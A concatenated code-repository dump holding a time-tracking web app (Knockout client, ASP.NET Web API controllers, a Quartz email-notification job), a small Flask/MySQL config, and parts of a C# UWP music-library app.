return http.remove(url + 'project/0/tasks/' + id);
},
startTask: function (id) {
return http.put(url + 'task/StartTask/' + id);
},
stopTask: function (id) {
return http.put(url + 'task/EndTask/' + id);
},
getConfiguration: function() {
return http.get(url + 'configuration');
},
updateConfiguration: function (cfg) {
return http.put(url + 'configuration', cfg);
}
};
})<file_sep>/CodeMeter/CodeMeter.Client/app/viewmodels/configuration.js
define(["jquery", "knockout", "durandal/app", "durandal/system", "plugins/router", "services/data", "komapping"], function ($, ko, app, system, router, data, mapper) {
var
// Properties
cfg = mapper.fromJS({
ID: '',
CheckInterval: 0,
CheckRunning: false,
NotificationInterval: 15,
Password: '',
Port: 26,
Recepient: '',
SendEmail: false,
SendSms: false,
Sender: '',
Smtp: '',
Ssl: false,
Username: ''
}),
isBusy = ko.observable(false),
// Handlers
save = function() {
isBusy(true);
data.updateConfiguration(cfg).done(function(){
}).fail(function(){
}).always(function(){
isBusy(false);
})
},
// Lifecycle
activate = function () {
return data.getConfiguration().done(function (configuration) {
mapper.fromJS(configuration, cfg);
})
},
deactivate = function () {};
return {
// Place your public properties here
isBusy: isBusy,
cfg: cfg,
save: save,
activate: activate,
deactivate: deactivate
};
});<file_sep>/CodeMeter/CodeMeter.Client/app/viewmodels/taskrunner.js
define(["jquery", "knockout", "durandal/app", "durandal/system", "plugins/router", "services/data", "moment", "utils/utils"], function ($, ko, app, system, router, data, moment, utils) {
var
// Properties
taskName = ko.observable(''),
TIME_FORMAT = "DD.MM.YYYY HH:mm:ss",
tId,
projectId,
error = ko.observable(''),
isRunning = ko.observable(false),
timer,
started = ko.observable('N/A'),
ended = ko.observable('N/A'),
elapsedTime,
elapsed = ko.observable('00:00:00'),
startTimer = function() {
isRunning(true);
timer = setInterval(function () {
elapsedTime += 1;
elapsed(utils.formatTime(elapsedTime));
}, 1000, true);
},
// Handlers
start = function () {
if (isRunning()) return;
data.startTask(tId).done(startTimer).fail(function (err) {
error(err.responseText);
});
},
pause = function () {
if (!isRunning()) return;
data.stopTask(tId).done(function (task) {
elapsedTime = task.ElapsedSeconds;
                elapsed(utils.formatTime(elapsedTime));
ended(moment(task.EndTime).format(TIME_FORMAT));
isRunning(false);
clearInterval(timer);
}).fail(function () {});
},
stop = function () {
pause();
router.navigate("#tasks/" + projectId);
},
// Lifecycle
activate = function (taskId) {
error('');
return data.getLastTaskRun(taskId).done(function (task) {
tId = task.ID;
projectId = task.ProjectID;
taskName(task.Name);
elapsedTime = task.ElapsedSeconds;
elapsed(utils.formatTime(elapsedTime));
started(task.StartTime ? moment(task.StartTime).format(TIME_FORMAT) : 'N/A')
ended(task.EndTime ? moment(task.EndTime).format(TIME_FORMAT): 'N/A')
if (task.IsRunning) {
startTimer();
}
}).fail(function () {});
},
deactivate = function () {
clearInterval(timer);
};
return {
// Place your public properties here
activate: activate,
deactivate: deactivate,
taskName: taskName,
start: start,
pause: pause,
stop: stop,
elapsed: elapsed,
isRunning: isRunning,
error: error,
started: started,
ended: ended
};
});<file_sep>/CodeMeter/CodeMeter.HttpService/Quartz/CheckJob.cs
using System;
using System.Net;
using System.Net.Mail;
using CodeMeter.HttpService.Models;
using Quartz;
using System.Linq;
namespace CodeMeter.HttpService.Quartz
{
public class CheckJob : IJob
{
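        // Runs on the Quartz schedule: when checking is enabled, find task logs that
        // are still open and send a notification once a task has been running longer
        // than the configured interval.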
public void Execute(IJobExecutionContext context)
{
using (var c = new DataContext())
{
var cfg = c.Configurations.Single();
if (cfg.CheckRunning && (cfg.SendEmail || cfg.SendSms))
{
var running = c.TaskLogs.Where(x => !x.End.HasValue);
var now = DateTime.Now;
foreach (var taskLog in running)
{
var timeRunning = (int)now.Subtract(taskLog.Start.Value).TotalMinutes;
if (timeRunning > cfg.NotificationInterval)
{
if (cfg.SendEmail)
{
try
{
using (var smtp = new SmtpClient(cfg.Smtp, cfg.Port))
{
smtp.EnableSsl = cfg.Ssl;
smtp.DeliveryMethod = SmtpDeliveryMethod.Network;
smtp.UseDefaultCredentials = false;
smtp.Credentials = new NetworkCredential(cfg.Username, cfg.Password);
var mail = new MailMessage(cfg.Sender, cfg.Recepient)
{
Subject = "CodeMeter Notification",
Body = "Task " + taskLog.TaskID + " is running for " + timeRunning + " minutes"
};
smtp.Send(mail);
}
}
catch
{
}
}
if (cfg.SendSms)
{
}
}
}
}
}
}
}
}<file_sep>/CodeMeter/CodeMeter.HttpService/Models/Configuration.cs
using System.ComponentModel.DataAnnotations;
namespace CodeMeter.HttpService.Models
{
public class Configuration : Entity
{
public int CheckInterval { get; set; }
public int NotificationInterval { get; set; }
public bool CheckRunning { get; set; }
public bool SendSms { get; set; }
public bool SendEmail { get; set; }
[StringLength(255)]
public string Recepient { get; set; }
[StringLength(255)]
public string Sender { get; set; }
[StringLength(255)]
public string Smtp { get; set; }
public int Port { get; set; }
[StringLength(255)]
public string Username { get; set; }
[StringLength(255)]
public string Password { get; set; }
public bool Ssl { get; set; }
}
}<file_sep>/CodeMeter/CodeMeter.HttpService/Controllers/TasksController.cs
using System;
using System.Net;
using System.Net.Http;
using System.Web.Http;
using System.Web.Http.Cors;
using CodeMeter.HttpService.Models;
using System.Data.Entity;
using System.Linq;
namespace CodeMeter.HttpService.Controllers
{
[EnableCors("*", "*", "*")]
public class TasksController : ApiController
{
public Project Get(int projectId)
{
using (var c = new DataContext())
{
var project = c.Projects.Include(x => x.Tasks).Include(x => x.Tasks.Select(t => t.Logs)).Single(x => x.ID == projectId);
foreach (var task in project.Tasks)
{
task.Project = null;
task.SetStartAndEnd();
task.Logs = null;
}
return project;
}
}
public Task Get(int projectId, int taskId)
{
using (var c = new DataContext())
{
return c.Tasks.Single(x => x.ID == taskId);
}
}
public HttpResponseMessage Post(HttpRequestMessage request, int projectId,Task task)
{
using (var c = new DataContext())
{
c.Tasks.Add(task);
c.SaveChanges();
}
var r = request.CreateResponse(HttpStatusCode.Created, task.ID);
return r;
}
public void Put(int projectId, int taskId, Task task)
{
using (var c = new DataContext())
{
c.Entry(task).State = EntityState.Modified;
c.SaveChanges();
}
}
public void Delete(int projectId, int taskId)
{
using (var c = new DataContext())
{
c.Entry(new Task{ID = taskId}).State = EntityState.Deleted;
c.SaveChanges();
}
}
[System.Web.Http.HttpGet]
public Task LastRun(int taskId)
{
using (var c = new DataContext())
{
var task = c.Tasks.Include(x => x.Logs).Single(x => x.ID == taskId);
task.SetStartAndEnd();
task.Logs = null;
return task;
}
}
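        // Only one task may run at a time; starting a second one returns 405 Method Not Allowed.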
[System.Web.Http.HttpPut]
public HttpResponseMessage StartTask(HttpRequestMessage request, int taskId)
{
using (var c = new DataContext())
{
if (c.Tasks.Any(x => x.IsRunning))
{
return request.CreateResponse(HttpStatusCode.MethodNotAllowed, "Some task already is running");
}
var task = c.Tasks.Single(x => x.ID == taskId);
task.Logs.Add(new TaskLog()
{
Start = DateTime.Now
});
task.IsRunning = true;
c.SaveChanges();
return request.CreateResponse(HttpStatusCode.OK, taskId);
}
}
[System.Web.Http.HttpPut]
public Task EndTask(HttpRequestMessage request, int taskId)
{
using (var c = new DataContext())
{
var task = c.Tasks.Include(x => x.Logs).Single(x => x.ID == taskId);
if (!task.IsRunning) return task;
task.IsRunning = false;
var logs = task.Logs.ToArray();
var last = logs.Last();
last.End = DateTime.Now;
task.SetStartAndEnd();
c.SaveChanges();
task.Logs = null;
return task;
}
}
}
}
<file_sep>/CodeMeter/CodeMeter.Client/app/viewmodels/projects.js
define(["jquery", "knockout", "durandal/app", "durandal/system", "plugins/router", "services/data", "utils/utils"], function ($, ko, app, system, router, data, utils) {
var
// Properties
timer,
refresh,
projects = ko.observableArray([]),
// Handlers
onCreateNew = function () {
router.navigate('#project');
},
onGotoProject = function (project) {
router.navigate("#tasks/" + project.ID);
},
onEditProject = function (project) {
router.navigate("#project/" + project.ID);
},
onDeleteProject = function (project) {
app.showMessage("Do you really want to delete project?", null, ["No", "Yes"]).then(function(result) {
if (result === "Yes") {
data.deleteProject(project.ID).done(function(){
projects.remove(project);
}).fail(function() {});
}
});
},
load = function () {
return data.getProjects().done(function(data) {
data.forEach(function(proj) {
proj.TotalTime = utils.formatTime(proj.TotalTime);
                proj.Total = Math.round(proj.Total * 100) / 100; // Math.round ignores a second argument
});
projects(data);
}).fail(function(err) {
});
        },
// Lifecycle
activate = function () {
refresh = app.on('refresh').then(load);
timer = setInterval(load, 30 * 1000);
return load();
},
deactivate = function () {
refresh.off();
clearInterval(timer);
};
return {
// Place your public properties here
activate: activate,
deactivate: deactivate,
projects: projects,
onCreateNew: onCreateNew,
onGotoProject: onGotoProject,
onEditProject: onEditProject,
onDeleteProject: onDeleteProject
};
});
<file_sep>/CodeMeter/CodeMeter.HttpService/Models/DataContext.cs
using System.Data.Entity;
namespace CodeMeter.HttpService.Models
{
public class DataContext : DbContext
{
static DataContext()
{
Database.SetInitializer(new MigrateDatabaseToLatestVersion<DataContext, Migrations.Configuration>());
}
public DataContext() : base("CodeMeter")
{}
public DbSet<Project> Projects { get; set; }
public DbSet<Task> Tasks { get; set; }
public DbSet<TaskLog> TaskLogs { get; set; }
public DbSet<Configuration> Configurations { get; set; }
}
}<file_sep>/CodeMeter/CodeMeter.HttpService/Controllers/ConfigurationController.cs
using System.Data.Entity;
using System.Linq;
using System.Web.Http;
using System.Web.Http.Cors;
using CodeMeter.HttpService.Models;
namespace CodeMeter.HttpService.Controllers
{
[EnableCors("*", "*", "*")]
public class ConfigurationController : ApiController
{
public Configuration GetConfiguration()
{
using (var c = new DataContext())
{
return c.Configurations.Single();
}
}
public void Put(Configuration configuration)
{
using (var c = new DataContext())
{
c.Entry(configuration).State = EntityState.Modified;
c.SaveChanges();
}
}
}
}
<file_sep>/CodeMeter/CodeMeter.HttpService/Models/Task.cs
using System;
using System.Collections.Generic;
using System.Collections.ObjectModel;
using System.ComponentModel.DataAnnotations;
using System.ComponentModel.DataAnnotations.Schema;
using System.Linq;
namespace CodeMeter.HttpService.Models
{
public class Task : Entity
{
public Task()
{
Logs = new Collection<TaskLog>();
}
[Required]
[StringLength(256)]
public string Name { get; set; }
[StringLength(2048)]
public string Description { get; set; }
public Project Project { get; set; }
public int ProjectID { get; set; }
public bool IsRunning { get; set; }
public ICollection<TaskLog> Logs { get; set; }
[NotMapped]
public DateTime? StartTime { get; set; }
[NotMapped]
public DateTime? EndTime { get; set; }
[NotMapped]
public int ElapsedSeconds { get; set; }
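        // Derives StartTime, EndTime and ElapsedSeconds from the task's logs;
        // a log without an End is treated as still running and counted up to now.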
internal void SetStartAndEnd()
{
var first = Logs.FirstOrDefault();
var last = Logs.LastOrDefault();
StartTime = first != null ? first.Start : null;
EndTime = last != null && last.End.HasValue ? last.End.Value : (StartTime != null ? DateTime.Now : (DateTime?)null);
if (StartTime == null || EndTime == null)
{
return;
}
ElapsedSeconds = 0;
foreach (var taskLog in Logs)
{
if (taskLog.End == null)
{
taskLog.End = DateTime.Now;
}
ElapsedSeconds += (int)taskLog.End.Value.Subtract(taskLog.Start.Value).TotalSeconds;
}
}
}
}
|
cb7ac3adec5ed1db3d75a68f9da7158b5d383069
|
[
"JavaScript",
"C#",
"Markdown"
] | 18
|
C#
|
TechLord-Forever/codemeter
|
5787ea21fc84d5f12d73c281a86ef7833850bf2a
|
4c33f909c476feceaafd2320a78a30e9fcec2553
|
refs/heads/main
|
<repo_name>itstep-python05/HR_DEP<file_sep>/hrdep/config.py
from flask import Flask
from flaskext.mysql import MySQL
app = Flask(__name__)
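# PythonAnywhere MySQL connection settings; the password placeholder must be
# replaced with the real credential before deploying.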
app.config['MYSQL_DATABASE_HOST'] = 'TarasKorneev.mysql.pythonanywhere-services.com'
app.config['MYSQL_DATABASE_USER'] = 'TarasKorneev'
app.config['MYSQL_DATABASE_PASSWORD'] = '<PASSWORD>'
app.config['MYSQL_DATABASE_DB'] = 'TarasKorneev$hrdep_db'
mysql = MySQL()
mysql.init_app(app)
<file_sep>/.bash_history
git init
git commit -m "создание первой таблици"
git status
git remote add origin https://github.com/itstep-python05/HR_DEP.git
git push -u origin main
git push -u origin master
exit
|
2a00a5a89a626525cabade8704ef2c132807285a
|
[
"Python",
"Shell"
] | 2
|
Python
|
itstep-python05/HR_DEP
|
0c0068ba49048c9acb80337c02cffe3383542164
|
69fce3277060dd2bdf1b7a4adcc381047631a6eb
|
refs/heads/master
|
<repo_name>kyledws/musicplus<file_sep>/MusicPlus/Models/Playlist.cs
using System.Collections.Generic;
namespace MusicPlus.Models
{
public class Playlist
{
public string Name { get; set; }
        public List<Song> Songs { get; private set; }

        public Playlist()
        {
            // Initialize the collection so Songs is never null.
            Songs = new List<Song>();
        }
}
}<file_sep>/MusicPlus/Models/Album.cs
using System.Collections.Generic;
namespace MusicPlus.Models
{
public class Album
{
public string Title { get; set; }
public string Artist { get; set; }
public List<Song> Songs { get; private set; }
public string AlbumArt { get; set; }
public Album(string title, string artist, string albumArt)
{
this.Title = title;
this.Artist = artist;
this.AlbumArt = albumArt;
this.Songs = new List<Song>();
}
}
}
<file_sep>/MusicPlus/Models/Library.cs
using System;
using System.Collections.Generic;
using System.Collections.ObjectModel;
using System.Collections.Specialized;
using System.IO;
using System.Linq;
using System.Threading.Tasks;
using Windows.Storage;
using Windows.Storage.FileProperties;
using Windows.Storage.Search;
namespace MusicPlus.Models
{
/// <summary>
/// A collection of Songs playable through this App
/// </summary>
public class Library
{
#region Static Public Entities
/// <summary>
/// Formats that Windows.UI.Xaml.Controls.MediaElement supports
/// </summary>
public static readonly string[] PlayableAudioFormats = new string[] { ".mp3", ".m4a", ".aac", ".wma", ".wav" };
#endregion
#region Properties/Fields
/// <summary>
/// Flag indicating if this Library's collections can be updated
/// </summary>
private bool _allowContentsChanged;
/// <summary>
/// Flag indicating if any monitored files have changed while this Library was updating
/// </summary>
private bool _contentsChangedWhileUpdating;
/// <summary>
/// Query that selects files to be added to this Library
/// </summary>
private StorageFileQueryResult _collectionQuery;
/// <summary>
/// Backing store for the LocalFilePath property
/// </summary>
private readonly string _localFilePath;
/// <summary>
/// Path, as a string, to the serialized Library (Read-only)
/// </summary>
public string LocalFilePath { get { return _localFilePath; } }
/// <summary>
/// Backing store for the LastCollectionUpdate property
/// </summary>
private DateTimeOffset _lastCollectionUpdate;
/// <summary>
/// Last time that Library was updated in any way (Read-only)
/// </summary>
public DateTimeOffset LastCollectionUpdate { get { return _lastCollectionUpdate; } }
/// <summary>
/// Backing store for the Songs property
/// </summary>
private ObservableCollection<Song> _songs;
/// <summary>
/// All Songs in this Library (Read-only)
/// </summary>
public ObservableCollection<Song> Songs { get { return _songs; } }
/// <summary>
/// Backing store for the Albums property
/// </summary>
private ObservableCollection<Album> _albums;
/// <summary>
/// All Albums in this Library (Read-only)
/// </summary>
public ObservableCollection<Album> Albums { get { return _albums; } }
/// <summary>
/// Backing store for the Artists property
/// </summary>
private ObservableCollection<Artist> _artists;
/// <summary>
/// All Artists in this Library (Read-only)
/// </summary>
public ObservableCollection<Artist> Artists { get { return _artists; } }
#endregion
#region Constructors
/// <summary>
/// Constructor for a Library with the default settings
/// Default Library : Windows.Storage.KnownFolders.MusicLibrary
/// Default Serialization File: Library.omlib
/// </summary>
private Library() : this(KnownFolders.MusicLibrary, "Library.omlib") { }
/// <summary>
/// Constructor for a Library with a custom folder and the default serializaton file
/// Default Serializaton File: Library.omlib
/// </summary>
/// <param name="folder">Folder where monitored files are stored</param>
private Library(StorageFolder folder) : this(folder, "Library.omlib") { }
/// <summary>
/// Constructor for a Library with a custom folder and serializaton file
/// </summary>
/// <param name="folder">Folder where monitored files are stored</param>
/// <param name="libFileName">Name of the file the Library is serialized to</param>
private Library(StorageFolder folder, string libFileName)
{
_songs = new ObservableCollection<Song>();
_albums = new ObservableCollection<Album>();
_artists = new ObservableCollection<Artist>();
_localFilePath = libFileName;
_lastCollectionUpdate = DateTimeOffset.MinValue; // Last update is the earliest possible date
_allowContentsChanged = true; // Changes can be made to this Library
// By default all supported files and sub-folder files of this Library's target folder will be monitored
var queryOptions = new QueryOptions(CommonFileQuery.DefaultQuery, PlayableAudioFormats);
queryOptions.FolderDepth = FolderDepth.Deep;
queryOptions.SetPropertyPrefetch(PropertyPrefetchOptions.MusicProperties | PropertyPrefetchOptions.BasicProperties, null);
_collectionQuery = folder.CreateFileQueryWithOptions(queryOptions);
// Monitor the target folder and its children for changes
_collectionQuery.ContentsChanged += CollectionQuery_ContentsChanged;
// Monitor the Songs collection for changes
this.Songs.CollectionChanged += Songs_CollectionChanged;
}
#endregion
#region Factories
/// <summary>
/// Returns an empty Library with the default settings
/// </summary>
/// <returns></returns>
public static Library GetEmptyLibrary()
{
return new Library();
}
/// <summary>
/// Returns an empty Library with the default filename and the given folder as its file source
/// </summary>
/// <param name="folder">Source for the Library's files</param>
/// <returns></returns>
public static Library GetEmptyLibrary(StorageFolder folder)
{
return new Library(folder);
}
/// <summary>
/// Returns an empty Library with the given filename and given folder as its file source
/// </summary>
/// <param name="folder">Source for the Library's files</param>
/// <param name="libFileName">Filename for the Library</param>
/// <returns></returns>
public static Library GetEmptyLibrary(StorageFolder folder, string libFileName)
{
return new Library(folder, libFileName);
}
/// <summary>
/// Returns a preloaded Library from the default settings
/// </summary>
/// <returns></returns>
public static async Task<Library> GetLibraryAsync()
{
Library lib = new Library();
await lib.UpdateSongsAsync();
return lib;
}
/// <summary>
/// Returns a preloaded Library with the files from the given folder
/// </summary>
/// <param name="folder">Source for the Library's files</param>
/// <returns></returns>
public static async Task<Library> GetLibraryAsync(StorageFolder folder)
{
Library lib = new Library(folder);
await lib.UpdateSongsAsync();
return lib;
}
/// <summary>
/// Returns a preloaded Library with the files from the given folder, assigns the given
/// filename as the filename for the Library
/// </summary>
/// <param name="folder">Source for the Library's files</param>
/// <param name="libFileName">Filename for the returned Library</param>
/// <returns></returns>
public static async Task<Library> GetLibraryAsync(StorageFolder folder, string libFileName)
{
Library lib = new Library(folder, libFileName);
await lib.UpdateSongsAsync();
return lib;
}
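/* Illustrative use of the factories above (a sketch, not code from this app):

       var lib = await Library.GetLibraryAsync();   // preloaded from the default Music library
       foreach (var song in lib.Songs)
       {
           System.Diagnostics.Debug.WriteLine(song.Title);
       }
*/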
/// <summary>
/// Returns the default Library for this App and returns it
/// </summary>
/// <returns></returns>
public static async Task<Library> OpenLibraryAsync()
{
throw new NotImplementedException();
}
/// <summary>
/// Returns a Library from the files in the given folder
/// </summary>
/// <param name="folder">Folder where the Library files are</param>
/// <returns></returns>
public static async Task<Library> OpenLibraryAsync(StorageFolder folder)
{
throw new NotImplementedException();
}
/// <summary>
/// Returns a Library from the files in the given folder and sets a custom serialization filename
/// </summary>
/// <param name="folder">Folder where the Library files are</param>
/// <param name="libFileName">Custom filename for the Libary</param>
/// <returns></returns>
public static async Task<Library> OpenLibraryAsync(StorageFolder folder, string libFileName)
{
throw new NotImplementedException();
}
/// <summary>
/// Saves the given Library to the default location for this App
/// </summary>
/// <param name="library">Library to be saved</param>
/// <returns></returns>
public static async Task SaveLibraryAsync(Library library)
{
throw new NotImplementedException();
}
#endregion
#region Song Methods
/// <summary>
/// Manually parse this Library's target folder's files and update the Songs collection
/// </summary>
public async Task UpdateSongsAsync()
{
List<string> newSongPaths = new List<string>();
// For all items and children in the target folder
// (fetch the count once up front; awaiting it in the loop condition would re-run the query every iteration)
uint itemCount = await _collectionQuery.GetItemCountAsync();
for (uint i = 0; i < itemCount; ++i)
{
// Get a StorageFile for that file
var storageFile = (await _collectionQuery.GetFilesAsync(i, 1))[0];
// Build a new Song
var song = new Song(storageFile.Path);
// If the Song is not in this Library, add it
if (!this.Songs.Contains(song))
{
song.Update(await storageFile.Properties.GetMusicPropertiesAsync());
this.Songs.Add(song);
}
else
{
// Else, find the Song in this Library
song = this.Songs[this.Songs.IndexOf(song)];
// If the file has been updated since the last Library update
// Update the Song properties
if ((await storageFile.GetBasicPropertiesAsync()).DateModified > this.LastCollectionUpdate)
{
song.Update(await storageFile.Properties.GetMusicPropertiesAsync());
}
}
// Cache the path for this Storage file
newSongPaths.Add(storageFile.Path);
}
// Iterate through a snapshot of the Songs in this Library
// (a copy is required because the collection is modified inside the loop)
// and remove any Song whose backing file is no longer returned by the query
foreach (var song in this.Songs.ToList())
{
if (!newSongPaths.Contains(song.FilePath))
{
this.Songs.Remove(song);
}
}
_lastCollectionUpdate = DateTimeOffset.Now;
}
#endregion
#region Albums/Artists Methods
/// <summary>
/// Add a Song to this Library's Album collection
/// </summary>
/// <param name="song">Song to add to the Album collection</param>
private void AddSongToAlbums(Song song)
{
// Look for the Song's album in this Library's Album collection
var album = this.Albums.FirstOrDefault((a) => a.Title == song.Album);
// If the Album wasn't found, create a new Album and add it to the Album collection
if (album == default(Album))
{
album = new Album(song.Album, song.Artist, "");
this.Albums.Add(album);
}
// If the found (or new) Album doesn't contain the given Song
// Add the given Song to the Album
if (!album.Songs.Contains(song))
{
album.Songs.Add(song);
}
}
/// <summary>
/// Add a song to this Library's Artist collection
/// </summary>
/// <param name="song">Song to add to the Artist collection</param>
private void AddSongToArtists(Song song)
{
// Look for the Song's artist in this Library's Artist collection
var artist = this.Artists.FirstOrDefault((a) => a.Name == song.Artist);
// Look for the Song's album in this Library's Album collection
var album = this.Albums.FirstOrDefault((a) => a.Title == song.Album);
// If the Artist wasn't found, create a new Artist and add it to the Artist collection
if (artist == default(Artist))
{
artist = new Artist(song.Artist);
this.Artists.Add(artist);
}
// If the Artist doesn't contain the Album, add it to the Artist's Album collection
if (!artist.Albums.Contains(album))
{
artist.Albums.Add(album);
}
// If the found (or new) Album doesn't contain the given Song
// Add the given Song to the album
if (!album.Songs.Contains(song))
{
album.Songs.Add(song);
}
}
/// <summary>
/// Remove a given Song from this Library's Album collection. Returns true if the
/// song was never in the Album collection or if the song was successfully removed.
/// Returns false otherwise. If the given Song's Album no longer has any Songs
/// the Album is removed from this Library's Album collection.
/// </summary>
/// <param name="song">Song to remove from the Album collection</param>
/// <returns>Status of successful removal of Song</returns>
private bool RemoveSongFromAlbums(Song song)
{
// Removal status
bool removed = false;
// Look for the given Song's Album in this Library's Album collection
var album = this.Albums.FirstOrDefault((a) => a.Title == song.Album);
// If the Album isn't in the Album collection, Song removal was successful
if (album == default(Album))
{
removed = true;
}
else
{
// Else, remove the Song from the Album
removed = album.Songs.Remove(song);
// If the Album's Song count is now 0, remove the Album from the Album collection
if (album.Songs.Count == 0)
{
this.Albums.Remove(album);
}
}
return removed;
}
/// <summary>
/// Remove a given song from this Library's Artist collection. Returns true if the
/// song was never in the Artist collection or if the song was successfully removed.
/// Returns false otherwise.
/// </summary>
/// <param name="song">Song to remove from the Album collection</param>
/// <returns>Status of successful removal of Song</returns>
private bool RemoveSongFromArtists(Song song)
{
// Removal status
bool removed = false;
// Look for the given Song's Artist in this Library's Artist collection
var artist = this.Artists.FirstOrDefault((a) => a.Name == song.Artist);
// If the Artist isn't in the Artist collection, Song removal was successful
if (artist == default(Artist))
{
removed = true;
}
else
{
// Else, continue attempt to remove the song
// Look for the given Song's Album in the Artist's Album collection
var album = artist.Albums.FirstOrDefault((a) => a.Title == song.Album);
// If the Album isn't in the Artist's Album collection, the collections are
// inconsistent, so report the removal as unsuccessful
if (album == default(Album))
{
removed = false;
}
else
{
// Else, remove the song from the Album
removed = album.Songs.Remove(song);
// If the Album's Song count is now 0, remove the Album from the Artist's Album collection
if (album.Songs.Count == 0)
{
artist.Albums.Remove(album);
}
// If the Artist's Album count is now 0, remove the Artist from this Library's Artist collection
if (artist.Albums.Count == 0)
{
this.Artists.Remove(artist);
}
}
}
return removed;
}
#endregion
#region Event Handlers
/// <summary>
/// Event handler for this Library's filesystem monitor
/// </summary>
private async void CollectionQuery_ContentsChanged(IStorageQueryResultBase sender, object args)
{
// If this Library is allowed to be updated, begin updating it
// Conditions where this Library can't be updated
// - It is already being updated
if (_allowContentsChanged)
{
// Until this Library no longer needs to be updated...
// - ('Needs' meaning this Library's filesystem monitor has indicated that
// a Song file has been updated which triggered this Event handler to be called.)
// - (_contentChangedWhileUpdating is the flag that indicates a required update.)
do
{
// Flag this Library as having not received a filesystem update
_contentsChangedWhileUpdating = false;
// Disable this Event handler's ability to update this Library
_allowContentsChanged = false;
// Update the Songs in this Library manually
// TODO: Find a way to only update the Songs that need updating
await this.UpdateSongsAsync();
// Re-enable this Event handler's ability to update this Library
_allowContentsChanged = true;
} while (_contentsChangedWhileUpdating);
}
else
{
// Else, flag this Library as needing to be updated
_contentsChangedWhileUpdating = true;
}
}
/// <summary>
/// Event handler for this Library's Song collection change events
/// </summary>
private void Songs_CollectionChanged(object sender, NotifyCollectionChangedEventArgs args)
{
// If Songs were added to this Library's Song collection, add the Song to the appropriate
// Album and Artist in this Library's Album and Artist collections, respectively
if (args.Action == NotifyCollectionChangedAction.Add)
{
foreach (var song in args.NewItems.Cast<Song>())
{
this.AddSongToAlbums(song);
this.AddSongToArtists(song);
}
}
else if (args.Action == NotifyCollectionChangedAction.Remove)
{
// Else, if Songs were removed from this Library's Song collection, remove the Song from
// the appropriate Album and Artist in this Library's Album and Artist collections, respectively
foreach (var song in args.OldItems.Cast<Song>())
{
this.RemoveSongFromAlbums(song);
this.RemoveSongFromArtists(song);
}
}
}
#endregion
#region Serialization Methods
/// <summary>
/// Save a given Library to this App's system provided folder
/// </summary>
/// <param name="lib">The library to be save</param>
/// <param name="localPath">The file path for the saved Library file</param>
public static async Task SaveLibraryToFileAsync(Library lib, string localPath)
{
// Create the Library's save file, or replace the old file if one exists
var libraryFile = await ApplicationData.Current.LocalFolder.CreateFileAsync(localPath, CreationCollisionOption.ReplaceExisting);
// Get the file paths for all the Songs in the given Library
var filePaths = from song in lib.Songs select song.FilePath;
// Write the query's folder path on the first line, then append one Song file path per line
// (WriteLinesAsync would replace the whole file, wiping the folder path written above)
await FileIO.WriteTextAsync(libraryFile, (lib._collectionQuery.Folder.Path + '\n'));
await FileIO.AppendLinesAsync(libraryFile, filePaths);
//TODO: Research and implement a more sophisticated serialization method
// i.e. one that isn't just writing filepaths as plain text to a text file
}
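/* The resulting save file is plain text: the monitored folder path on the first line,
   then one Song file path per line. For example (illustrative paths, not real data):

       C:\Users\kyle\Music
       C:\Users\kyle\Music\Album\Track01.mp3
       C:\Users\kyle\Music\Album\Track02.mp3
*/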
/// <summary>
/// Load a Library with a given name from this App's system provided folder
/// </summary>
/// <param name="localPath"></param>
/// <returns>A Library with all of the Songs retrieved from the given file path</returns>
public static async Task<Library> LoadLibraryFromFileAsync(string localPath)
{
// Create a null variable to store the Library's StorageFile
StorageFile libraryFile;
// Try to locate the given file path in this App's folder
try
{
libraryFile = await ApplicationData.Current.LocalFolder.GetFileAsync(localPath);
}
catch (Exception e)
{
// If it couldn't be found, throw the custom LibraryFileNotFound Exception
if (e is FileNotFoundException)
{
throw new LibraryFileNotFoundException("Library file does not exist.", e);
}
else
{
// Else, rethrow whatever exception reached this function (a bare throw preserves the stack trace)
throw;
}
}
// Read all the saved lines (folder path plus Song file paths) from the library file
//TODO: Check that the library file is formatted correctly
IList<string> filePaths = await FileIO.ReadLinesAsync(libraryFile);
// Create a null variable to store the Library's storage folder
StorageFolder libraryFolder;
// The first line of the library file should be the path to the Library's folder
// Try to get the Library's folder
try
{
libraryFolder = await StorageFolder.GetFolderFromPathAsync(filePaths[0]);
filePaths.RemoveAt(0);
}
catch
{
// Rethrow whatever exception reached this function (a bare throw preserves the stack trace)
//TODO: Create a custom Exception to indicate when the error was the given file path
throw;
}
// Create a new Library
Library lib = new Library(libraryFolder, localPath);
// Add all the Songs from the save file to that Library
foreach (var song in (from file in filePaths select new Song(file)))
{
await song.UpdateAsync();
lib.Songs.Add(song);
}
return lib;
}
#endregion
}
/// <summary>
/// Exception class dedicated to Exception raised when a Library's serialized file can't be found
/// </summary>
public class LibraryFileNotFoundException : Exception
{
public LibraryFileNotFoundException() : base() { }
public LibraryFileNotFoundException(string message) : base(message) { }
public LibraryFileNotFoundException(string message, Exception innerException) : base(message, innerException) { }
}
}
<file_sep>/MusicPlus/AppController.cs
using MusicPlus.Models;
using System;
using System.Threading.Tasks;
using System.Windows.Input;
using Windows.UI.Xaml;
using Windows.UI.Xaml.Controls;
using Windows.UI.Xaml.Media;
namespace MusicPlus
{
public class AppController
{
public ICommand PlayCommand { get; set; }
public ICommand PauseCommand { get; set; }
public ICommand NextCommand { get; set; }
public ICommand PreviousCommand { get; set; }
public ICommand ToggleRepeatCommand { get; set; }
public ICommand ToggleShuffleCommand { get; set; }
public ICommand TogglePlayPauseCommand { get; set; }
public Frame ContainerFrame { get; set; }
public MediaElement AudioPlayer { get; set; }
private DispatcherTimer _audioTimer;
private Library _library;
public Library Library
{
get
{
return _library;
}
}
public AppController ()
{
_library = Library.GetEmptyLibrary();
_audioTimer = new DispatcherTimer();
_audioTimer.Interval = TimeSpan.FromMilliseconds(250);
_audioTimer.Tick += AudioTimer_Tick;
//this.AudioPlayer.CurrentStateChanged += AudioPlayer_CurrentStateChanged;
}
private void Play(object parameter)
{
System.Diagnostics.Debug.WriteLine("Playing Song");
}
private void TogglePlayPause(object parameter)
{
if (this.AudioPlayer.CurrentState == MediaElementState.Playing)
{
this.AudioPlayer.Pause();
}
else
{
this.AudioPlayer.Play();
}
}
private void AudioPlayer_CurrentStateChanged(object sender, RoutedEventArgs e)
{
if (this.AudioPlayer.CurrentState == MediaElementState.Playing)
{
_audioTimer.Start();
}
else
{
_audioTimer.Stop();
}
}
private void AudioTimer_Tick(object sender, object e)
{
throw new NotImplementedException();
}
public async Task InitializeLibraryViewModelAsync()
{
await this.Library.UpdateSongsAsync();
}
}
}
<file_sep>/MusicPlus/Models/Song.cs
using System;
using System.Threading.Tasks;
using Windows.Storage;
using Windows.Storage.FileProperties;
namespace MusicPlus.Models
{
public class Song
{
